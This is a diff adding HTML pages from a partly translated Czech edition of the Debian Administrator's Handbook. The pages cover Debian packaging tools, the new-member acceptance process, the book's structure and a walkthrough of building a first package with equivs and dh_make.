+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">debrelease</code> uploads a recently-generated package to a remote server, without needing to type the full name and path of the related <code
+                        class="filename">.changes</code> file.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">debsign</code> signs the <code
+                        class="filename">*.dsc</code> and <code
+                        class="filename">*.changes</code> files.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">uupdate</code> automates the creation of a new revision of a package when a new upstream version has been released.
+							</div></li></ul></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.18.7.2.5.6"></a>15.4.1.3.4. <span
+                        class="pkg pkg">debhelper</span> and <span
+                        class="pkg pkg">dh-make</span></h5></div></div></div><a
+                id="id-1.18.7.2.5.6.2"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.6.3"
+                class="indexterm"></a><div
+                class="para">
+						Debhelper is a set of scripts easing the creation of policy-compliant packages; these scripts are invoked from <code
+                  class="filename">debian/rules</code>. Debhelper has been widely adopted within Debian, as evidenced by the fact that it is used by the majority of official Debian packages. All the commands it contains have a <code
+                  class="command">dh_</code> prefix.
+					</div><div
+                class="para">
+						The <code
+                  class="command">dh_make</code> script (in the <span
+                  class="emphasis"><em>dh-make</em></span> package) creates files required for generating a Debian package in a directory initially containing the sources for a piece of software. As can be guessed from the name of the program, the generated files use debhelper by default.
+					</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.18.7.2.5.7"></a>15.4.1.3.5. <code
+                        class="command">dupload</code> and <code
+                        class="command">dput</code></h5></div></div></div><a
+                id="id-1.18.7.2.5.7.2"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.7.3"
+                class="indexterm"></a><div
+                class="para">
+						The <code
+                  class="command">dupload</code> and <code
+                  class="command">dput</code> commands allow uploading a Debian package to a (possibly remote) server. This allows developers to publish their package on the main Debian server (<code
+                  class="literal">ftp-master.debian.org</code>) so that it can be integrated to the archive and distributed by mirrors. These commands take a <code
+                  class="filename">*.changes</code> file as a parameter, and deduce the other relevant files from its contents.
+					</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.18.7.3"></a>15.4.2. Acceptance Process</h3></div></div></div><div
+            class="para">
+				Becoming a “Debian developer” is not a simple administrative matter. The process comprises several steps, and is as much an initiation as it is a selection process. In any case, it is formalized and well-documented, so anyone can track their progression on the website dedicated to the new member process. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://nm.debian.org/">https://nm.debian.org/</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>EXTRA</em></span> Lightweight process for “Debian Maintainers”</strong></p></div></div></div><div
+              class="para">
+				“Debian Maintainer” is another status that gives less privileges than “Debian developer” but whose associated process is quicker. With this status, the contributors can maintain their own packages only. A Debian developer only needs to perform a check on an initial upload, and issue a statement to the effect that they trust the prospective maintainer with the ability to maintain the package on their own.
+			</div><a
+              id="id-1.18.7.3.3.3"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.3.4"></a>15.4.2.1. Prerequisites</h4></div></div></div><div
+              class="para">
+					All candidates are expected to have at least a working knowledge of the English language. This is required at all levels: for the initial communications with the examiner, of course, but also later, since English is the preferred language for most of the documentation; also, package users will be communicating in English when reporting bugs, and they will expect replies in English.
+				</div><div
+              class="para">
+					The other prerequisite deals with motivation. Becoming a Debian developer is a process that only makes sense if the candidate knows that their interest in Debian will last for many months. The acceptance process itself may last for several months, and Debian needs developers for the long haul; each package needs permanent maintenance, and not just an initial upload.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.3.5"></a>15.4.2.2. Registration</h4></div></div></div><div
+              class="para">
+					The first (real) step consists in finding a sponsor or advocate; this means an official developer willing to state that they believe that accepting <span
+                class="emphasis"><em>X</em></span> would be a good thing for Debian. This usually implies that the candidate has already been active within the community, and that their work has been appreciated. If the candidate is shy and their work is not publicly touted, they can try to convince a Debian developer to advocate them by showing their work in a private way.
+				</div><a
+              id="id-1.18.7.3.5.3"
+              class="indexterm"></a><div
+              class="para">
+					At the same time, the candidate must generate a public/private RSA key pair with GnuPG, which should be signed by at least two official Debian developers. The signature authenticates the name on the key. Effectively, during a key signing party, each participant must show an official identification (usually an ID card or passport) together with their key identifiers. This step confirms the link between the human and the keys. This signature thus requires meeting in real life. If you have not yet met any Debian developers in a public free software conference, you can explicitly seek developers living nearby using the list on the following webpage as a starting point. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://wiki.debian.org/Keysigning">https://wiki.debian.org/Keysigning</a></div>
+				</div><div
+              class="para">
+					Once the registration on <code
+                class="literal">nm.debian.org</code> has been validated by the advocate, an <span
+                class="emphasis"><em>Application Manager</em></span> is assigned to the candidate. The application manager will then drive the process through multiple pre-defined steps and checks.
+				</div><div
+              class="para">
+					The first verification is an identity check. If you already have a key signed by two Debian developers, this step is easy; otherwise, the application manager will try and guide you in your search for Debian developers close by to organize a meet-up and a key signing.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.3.6"></a>15.4.2.3. Accepting the Principles</h4></div></div></div><div
+              class="para">
+					These administrative formalities are followed by philosophical considerations. The point is to make sure that the candidate understands and accepts the social contract and the principles behind Free Software. Joining Debian is only possible if one shares the values that unite the current developers, as expressed in the founding texts (and summarized in <a
+                class="xref"
+                href="the-debian-project.html">1 – „<em>Projekt Debian</em>“</a>).
+				</div><div
+              class="para">
+					In addition, each candidate wishing to join the Debian ranks is expected to know the workings of the project, and how to interact appropriately to solve the problems they will doubtless encounter as time passes. All of this information is generally documented in manuals targeting the new maintainers, and in the Debian developer's reference. An attentive reading of this document should be enough to answer the examiner's questions. If the answers are not satisfactory, the candidate will be informed. They will then have to read (again) the relevant documentation before trying again. In the cases where the existing documentation does not contain the appropriate answer for the question, the candidate can usually reach an answer with some practical experience within Debian, or potentially by discussing with other Debian developers. This mechanism ensures that candidates get involved somewhat in Debian before becoming a full part of it. It is a deliberate policy, by which candidates who eventually join the project are integrated as another piece of an infinitely extensible jigsaw puzzle.
+				</div><a
+              id="id-1.18.7.3.6.4"
+              class="indexterm"></a><div
+              class="para">
+					This step is usually known as the <span
+                class="emphasis"><em>Philosophy &amp; Procedures</em></span> (P&amp;P for short) in the lingo of the developers involved in the new member process.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.3.7"></a>15.4.2.4. Checking Skills</h4></div></div></div><div
+              class="para">
+					Each application to become an official Debian developer must be justified. Becoming a project member requires showing that this status is legitimate, and that it facilitates the candidate's job in helping Debian. The most common justification is that being granted Debian developer status eases maintenance of a Debian package, but it is not the only one. Some developers join the project to contribute to porting to a specific architecture, others want to improve documentation, and so on.
+				</div><div
+              class="para">
+					This step represents the opportunity for the candidate to state what they intend to do within the Debian project and to show what they have already done towards that end. Debian is a pragmatic project and saying something is not enough, if the actions do not match what is announced. Generally, when the intended role within the project is related to package maintenance, a first version of the prospective package will have to be validated technically and uploaded to the Debian servers by a sponsor among the existing Debian developers.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>COMMUNITY</em></span> Sponsoring</strong></p></div></div></div><a
+                id="id-1.18.7.3.7.4.2"
+                class="indexterm"></a><div
+                class="para">
+					Debian developers can “sponsor” packages prepared by someone else, meaning that they publish them in the official Debian repositories after having performed a careful review. This mechanism enables external persons, who have not yet gone through the new member process, to contribute occasionally to the project. At the same time, it ensures that all packages included in Debian have always been checked by an official member.
+				</div></div><div
+              class="para">
+					Finally, the examiner checks the candidate's technical (packaging) skills with a detailed questionnaire. Bad answers are not permitted, but the answer time is not limited. All the documentation is available and several tries are allowed if the first answers are not satisfactory. This step does not intend to discriminate, but to ensure at least a modicum of knowledge common to new contributors.
+				</div><a
+              id="id-1.18.7.3.7.6"
+              class="indexterm"></a><div
+              class="para">
+					This step is known as the <span
+                class="emphasis"><em>Tasks &amp; Skills</em></span> step (T&amp;S for short) in the examiners' jargon.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.3.8"></a>15.4.2.5. Final Approval</h4></div></div></div><div
+              class="para">
+					At the very last step, the whole process is reviewed by a DAM (<span
+                class="emphasis"><em>Debian Account Manager</em></span>). The DAM will review all the information about the candidate that the examiner collected, and makes the decision on whether or not to create an account on the Debian servers. In cases where extra information is required, the account creation may be delayed. Refusals are rather rare if the examiner does a good job of following the process, but they sometimes happen. They are never permanent, and the candidate is free to try again at a later time.
+				</div><div
+              class="para">
+					The DAM's decision is authoritative and (almost) without appeal, which explains why the people in that seat have often been criticized in the past.
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.setup-apt-package-repository.html"><strong>Předcházející</strong>15.3. Creating a Package Repository for APT</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="conclusion.html"><strong>Další</strong>Kapitola 16. Conclusion: Debian's Future</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.book-structure.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.book-structure.html
new file mode 100644
index 000000000..cce8024bf
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.book-structure.html
@@ -0,0 +1,184 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">4. truktura knihy</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="foreword.html"
+        title="Předmluva" /><link
+        rel="prev"
+        href="sect.selected-approach.html"
+        title="3. Obecný přístup" /><link
+        rel="next"
+        href="sect.acknowledgments.html"
+        title="5. Poděkování" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.book-structure.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.selected-approach.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.acknowledgments.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.book-structure"></a>4. truktura knihy</h2></div></div></div><div
+          class="para">
+			This book is built around a case study providing both support and illustration for all topics being addressed.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>POZNÁMKA</em></span> Webové stránky, emaily autorů</strong></p></div></div></div><div
+            class="para">
+			Tato kniha má své vlastní webové stránky, které obsahují různé užitečné prvky. Zejména obsahují online verzi knihy s odkazy na kliknutí, a případné chyby. Neváhejte si je prohlédnut a nechat nám nějakou zpětnou vazbu. Rádi si přečteme vaše komentáře nebo zprávy. Pošlete je e-mailem na <code
+              class="email"><a
+                class="email"
+                href="mailto:hertzog@debian.org">hertzog@debian.org</a></code> (Raphaël) a <code
+              class="email"><a
+                class="email"
+                href="mailto:lolando@debian.org">lolando@debian.org</a></code> (Roland).<div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://debian-handbook.info/">http://debian-handbook.info/</a></div>
+		</div></div><div
+          class="para">
+			<span
+            class="strong strong"><strong>Kapitola 1</strong></span> se zaměřuje na netechnickou prezentaci projektu Debian a popisuje její cíle a organizaci. Tyto aspekty jsou důležité, protože definují obecný rámec, který další kapitoly doplní konkrétnějšími informacemi.
+		</div><div
+          class="para">
+			<span
+            class="strong strong"><strong>Kapitoly 2 a 3</strong></span> poskytují široký nástin případové studie. V tomto bodě by si mohli začínající čtenáři najít čas na čtení <span
+            class="strong strong"><strong>dodatku B</strong></span>, kde najdetou krátký doučovací kurz vysvětlující řadu základních počítačových pojmů, stejně jako koncepty vlastní jakémukoliv Unixovému systému.
+		</div><div
+          class="para">
+			Abychom se dostali k podstatě předmětu, zcela přirozeně začneme procesem instalace (<span
+            class="strong strong"><strong>Kapitola 4</strong></span>); <span
+            class="strong strong"><strong>kapitoly 5 a 6</strong></span> představí základní nástroje, které bude používat každý správce Debianu, jako jsou ty z rodiny <span
+            class="strong strong"><strong>APT</strong></span> , která je z velké části zodpovědná za vynikající reputaci distribuce. Tyto kapitoly nejsou nijak omezeny na profesionály, protože doma je každý svým vlastním administrátorem.
+		</div><div
+          class="para">
+			<span
+            class="strong strong"><strong>Kapitola 7</strong></span> bude důležitá vsuvka; Popisuje pracovní postupy k efektivnímu používání dokumentace a rychlému pochopení problémů, za účelem jejich vyřešení.
+		</div><div
+          class="para">
+			Následující kapitoly budou podrobnější prohlídkou systému, počínaje základní infrastrukturou a službami (<span
+            class="strong strong"><strong>kapitoly 8 až 10</strong></span>) a postupně se zásobníkem se dostaneme až k uživatelským aplikacím v <span
+            class="strong strong"><strong>kapitole 13</strong></span>. <span
+            class="strong strong"><strong>Kapitola 12</strong></span> se zabývá pokročilejšími předměty, které se nejvíce přímo týkají správců velkých souborů počítačů (včetně serverů), zatímco <span
+            class="strong strong"><strong>Kapitola 14</strong></span> je stručný úvod do širšího předmětu počítačové bezpečnosti a dává několik návodů, jak se vyhnout většině problémů.
+		</div><div
+          class="para">
+			<span
+            class="strong strong"><strong>Kapitola 15</strong></span> je pro administrátory, kteří chtějí jít dál a vytvořit si vlastní debianovské balíčky.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>Slovní zásoba</em></span> Balíček Debianu</strong></p></div></div></div><a
+            id="id-1.3.8.10.2"
+            class="indexterm"></a><a
+            id="id-1.3.8.10.3"
+            class="indexterm"></a><a
+            id="id-1.3.8.10.4"
+            class="indexterm"></a><a
+            id="id-1.3.8.10.5"
+            class="indexterm"></a><div
+            class="para">
+			Balíček Debianu je archiv obsahující všechny soubory potřebné k instalaci softwaru. Obvykle se jedná o soubor s příponou <code
+              class="filename">deb</code> , který lze zpracovat příkazem <code
+              class="command">dpkg</code>. Také nazývaný <span
+              class="emphasis"><em>binární balíček</em></span>obsahuje soubory, které lze přímo použít (například programy nebo dokumentace). Na druhou stranu <span
+              class="emphasis"><em>zdrojový balíček</em></span> obsahuje zdrojový kód pro software a pokyny potřebné pro sestavení binárního balíčku.
+		</div></div><div
+          class="para">
+			The present version is already the eighth edition of the book (we include the first four that were only available in French). This edition covers version 9 of Debian, code-named <span
+            class="distribution distribution">Stretch</span>. Among the changes, Debian now sports a new architecture — <span
+            class="emphasis"><em>mips64el</em></span> for little-endian 64-bit MIPS processors. On the opposite side, the <span
+            class="emphasis"><em>powerpc</em></span> architecture has been dropped due to lack of volunteers to keep up with development (which itself can be explained by the fact that associated hardware is getting old and less interesting to work on). All included packages have obviously been updated, including the GNOME desktop, which is now in its version 3.22. Most executables have been rebuilt with PIE build flags thus enabling supplementary hardening measures (Address Space Layout Randomization, ASLR).
+		</div><div
+          class="para">
+			Přidali jsme nějaké poznámky a boční komentáře. Mají různé role: mohou upozornit na obtížný bod, dokončit myšlenku případové studie, definovat některé termíny, nebo sloužit jako připomenutí. Zde je seznam nejběžnějších bočních poznámek:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					ZPĚT k ZÁKLADŮM: připomínka některých informací, které mají být známy;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					SLOVNÍ ZÁSOBA: definuje technický termín, někdy specifický pro Debian;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					KOMUNITA: poukazuje na důležité osoby nebo role v rámci projektu;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					ZÁSADY: pravidlo nebo doporučení ze zásad Debianu. Tento dokument je nezbytný v rámci projektu a popisuje, jak balíčkovat software. Části zásad zvýrazněné v této příručce přináší uživatelům přímé výhody (například s vědomím, že zásady standardizují umístění dokumentace a příklady usnadňují najít je i v novém balíčku).
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					Nástroj: představuje příslušný nástroj nebo službu;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					V praxi: teorie nemusí vždy odpovídat praxi; tyto boční poznámky obsahují rady vyplývající z našich zkušeností. Mohou také poskytnout podrobné a konkrétní příklady;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					ostatní více či méně časté boční komentáře jsou do jisté míry zřejmé: KULTURA, TIP, UPOZORNĚNÍ, JDĚTE DÁL, BEZPEČNOST, a tak dále.
+				</div></li></ul></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.selected-approach.html"><strong>Předcházející</strong>3. Obecný přístup</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.acknowledgments.html"><strong>Další</strong>5. Poděkování</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.building-first-package.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.building-first-package.html
new file mode 100644
index 000000000..900d31308
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.building-first-package.html
@@ -0,0 +1,386 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">15.2. Building your First Package</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Backport, Rebuild, Source package, Archive, Meta-package, Debian Developer, Maintainer" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="debian-packaging.html"
+        title="Kapitola 15. Creating a Debian Package" /><link
+        rel="prev"
+        href="debian-packaging.html"
+        title="Kapitola 15. Creating a Debian Package" /><link
+        rel="next"
+        href="sect.setup-apt-package-repository.html"
+        title="15.3. Creating a Package Repository for APT" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.building-first-package.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="debian-packaging.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.setup-apt-package-repository.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.building-first-package"></a>15.2. Building your First Package</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.18.5.2"></a>15.2.1. Meta-Packages or Fake Packages</h3></div></div></div><div
+            class="para">
+				Fake packages and meta-packages are similar, in that they are empty shells that only exist for the effects their meta-data have on the package handling stack.
+			</div><div
+            class="para">
+				The purpose of a fake package is to trick <code
+              class="command">dpkg</code> and <code
+              class="command">apt</code> into believing that some package is installed even though it's only an empty shell. This allows satisfying dependencies on a package when the corresponding software was installed outside the scope of the packaging system. Such a method works, but it should still be avoided whenever possible, since there is no guarantee that the manually installed software behaves exactly like the corresponding package would and other packages depending on it would not work properly.
+			</div><div
+            class="para">
+				On the other hand, a meta-package exists mostly as a collection of dependencies, so that installing the meta-package will actually bring in a set of other packages in a single step.
+			</div><div
+            class="para">
+				Both these kinds of packages can be created by the <code
+              class="command">equivs-control</code> and <code
+              class="command">equivs-build</code> commands (in the <span
+              class="pkg pkg">equivs</span> package). The <code
+              class="command">equivs-control <em
+                class="replaceable">file</em></code> command creates a Debian package header file that should be edited to contain the name of the expected package, its version number, the name of the maintainer, its dependencies, and its description. Other fields without a default value are optional and can be deleted. The <code
+              class="literal">Copyright</code>, <code
+              class="literal">Changelog</code>, <code
+              class="literal">Readme</code> and <code
+              class="literal">Extra-Files</code> fields are not standard fields in Debian packages; they only make sense within the scope of <code
+              class="command">equivs-build</code>, and they will not be kept in the headers of the generated package.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.18.5.2.6"></a><p
+              class="title"><strong>Příklad 15.2. Header file of the <span
+                  class="emphasis"><em>libxml-libxml-perl</em></span> fake package</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+Section: perl
+Priority: optional
+Standards-Version: 3.9.6
+
+Package: libxml-libxml-perl
+Version: 2.0116-1
+Maintainer: Raphael Hertzog &lt;hertzog@debian.org&gt;
+Depends: libxml2 (&gt;= 2.7.4)
+Architecture: all
+Description: Fake package - module manually installed in site_perl
+ This is a fake package to let the packaging system
+ believe that this Debian package is installed. 
+ .
+ In fact, the package is not installed since a newer version
+ of the module has been manually compiled &amp; installed in the
+ site_perl directory.
+</pre></div></div><div
+            class="para">
+				The next step is to generate the Debian package with the <code
+              class="command">equivs-build <em
+                class="replaceable">file</em></code> command. Voilà: the package is created in the current directory and it can be handled like any other Debian package would.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.18.5.3"></a>15.2.2. Simple File Archive</h3></div></div></div><div
+            class="para">
+				The Falcot Corp administrators need to create a Debian package in order to ease deployment of a set of documents on a large number of machines. The administrator in charge of this task first reads the “New Maintainer's Guide”, then starts working on their first package. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/doc/manuals/maint-guide/">https://www.debian.org/doc/manuals/maint-guide/</a></div>
+			</div><div
+            class="para">
+				The first step is creating a <code
+              class="filename">falcot-data-1.0</code> directory to contain the target source package. The package will logically, be named <code
+              class="literal">falcot-data</code> and bear the <code
+              class="literal">1.0</code> version number. The administrator then places the document files in a <code
+              class="filename">data</code> subdirectory. Then they invoke the <code
+              class="command">dh_make</code> command (from the <span
+              class="pkg pkg">dh-make</span> package) to add files required by the package generation process, which will all be stored in a <code
+              class="filename">debian</code> subdirectory:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cd falcot-data-1.0</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>dh_make --native</code></strong>
+<code
+              class="computeroutput">
+Type of package: single binary, indep binary, multiple binary, library, kernel module, kernel patch?
+ [s/i/m/l/k/n] </code><strong
+              class="userinput"><code>i</code></strong>
+<code
+              class="computeroutput">
+Maintainer name : Raphael Hertzog
+Email-Address   : hertzog@debian.org
+Date            : Fri, 04 Sep 2015 12:09:39 -0400
+Package Name    : falcot-data
+Version         : 1.0
+License         : gpl3
+Type of Package : Independent
+Hit &lt;enter&gt; to confirm:
+Currently there is no top level Makefile. This may require additional tuning.
+Done. Please edit the files in the debian/ subdirectory now. You should also
+check that the falcot-data Makefiles install into $DESTDIR and not in / .
+$</code></pre><div
+            class="para">
+				The selected type of package (<span
+              class="emphasis"><em>indep binary</em></span>) indicates that this source package will generate a single binary package that can be shared across all architectures (<code
+              class="literal">Architecture: all</code>). <span
+              class="emphasis"><em>single binary</em></span> acts as a counterpart, and leads to a single binary package that is dependent on the target architecture (<code
+              class="literal">Architecture: any</code>). In this case, the former choice is more relevant since the package only contains documents and no binary programs, so it can be used similarly on computers of all architectures.
+			</div><a
+            id="id-1.18.5.3.6"
+            class="indexterm"></a><a
+            id="id-1.18.5.3.7"
+            class="indexterm"></a><div
+            class="para">
+				The <span
+              class="emphasis"><em>multiple binary</em></span> type corresponds to a source package leading to several binary packages. A particular case, <span
+              class="emphasis"><em>library</em></span>, is useful for shared libraries, since they need to follow strict packaging rules. In a similar fashion, <span
+              class="emphasis"><em>kernel module</em></span> or <span
+              class="emphasis"><em>kernel patch</em></span> should be restricted to packages containing kernel modules.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Maintainer's name and email address</strong></p></div></div></div><div
+              class="para">
+				Most of the programs involved in package maintenance will look for your name and email address in the <code
+                class="varname">DEBFULLNAME</code> and <code
+                class="varname">DEBEMAIL</code> or <code
+                class="varname">EMAIL</code> environment variables. Defining them once and for all will avoid you having to type them multiple times. If your usual shell is <code
+                class="command">bash</code>, it is a simple matter of adding the following two lines in your <code
+                class="filename">~/.bashrc</code> file (you will obviously replace the values with more relevant ones!):
+			</div><pre
+              class="programlisting">
+export EMAIL="hertzog@debian.org"
+export DEBFULLNAME="Raphael Hertzog"
+</pre></div><div
+            class="para">
+				The <code
+              class="command">dh_make</code> command created a <code
+              class="filename">debian</code> subdirectory with many files. Some are required, in particular <code
+              class="filename">rules</code>, <code
+              class="filename">control</code>, <code
+              class="filename">changelog</code> and <code
+              class="filename">copyright</code>. Files with the <code
+              class="filename">.ex</code> extension are example files that can be used by modifying them (and removing the extension) when appropriate. When they are not needed, removing them is recommended. The <code
+              class="filename">compat</code> file should be kept, since it is required for the correct functioning of the <span
+              class="emphasis"><em>debhelper</em></span> suite of programs (all beginning with the <code
+              class="command">dh_</code> prefix) used at various stages of the package build process.
+			</div><div
+            class="para">
+				The <code
+              class="filename">copyright</code> file must contain information about the authors of the documents included in the package, and the related license. In our case, these are internal documents and their use is restricted to within the Falcot Corp company. The default <code
+              class="filename">changelog</code> file is generally appropriate; replacing the “Initial release” with a more verbose explanation and changing the distribution from <code
+              class="literal">unstable</code> to <code
+              class="literal">internal</code> is enough. The <code
+              class="filename">control</code> file was also updated: the <code
+              class="literal">Section</code> field has been changed to <span
+              class="emphasis"><em>misc</em></span> and the <code
+              class="literal">Homepage</code>, <code
+              class="literal">Vcs-Git</code> and <code
+              class="literal">Vcs-Browser</code> fields were removed. The <code
+              class="literal">Depends</code> fields was completed with <code
+              class="literal">iceweasel | www-browser</code> so as to ensure the availability of a web browser able to display the documents in the package.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.18.5.3.12"></a><p
+              class="title"><strong>Příklad 15.3. The <code
+                  class="filename">control</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+Source: falcot-data
+Section: misc
+Priority: optional
+Maintainer: Raphael Hertzog &lt;hertzog@debian.org&gt;
+Build-Depends: debhelper (&gt;= 9)
+Standards-Version: 3.9.5
+
+Package: falcot-data
+Architecture: all
+Depends: iceweasel | www-browser, ${misc:Depends}
+Description: Internal Falcot Corp Documentation
+ This package provides several documents describing the internal
+ structure at Falcot Corp.  This includes:
+  - organization diagram
+  - contacts for each department.
+ .
+ These documents MUST NOT leave the company.
+ Their use is INTERNAL ONLY.
+</pre></div></div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.18.5.3.13"></a><p
+              class="title"><strong>Příklad 15.4. The <code
+                  class="filename">changelog</code> file</strong></p><div
+              class="example-contents"><pre
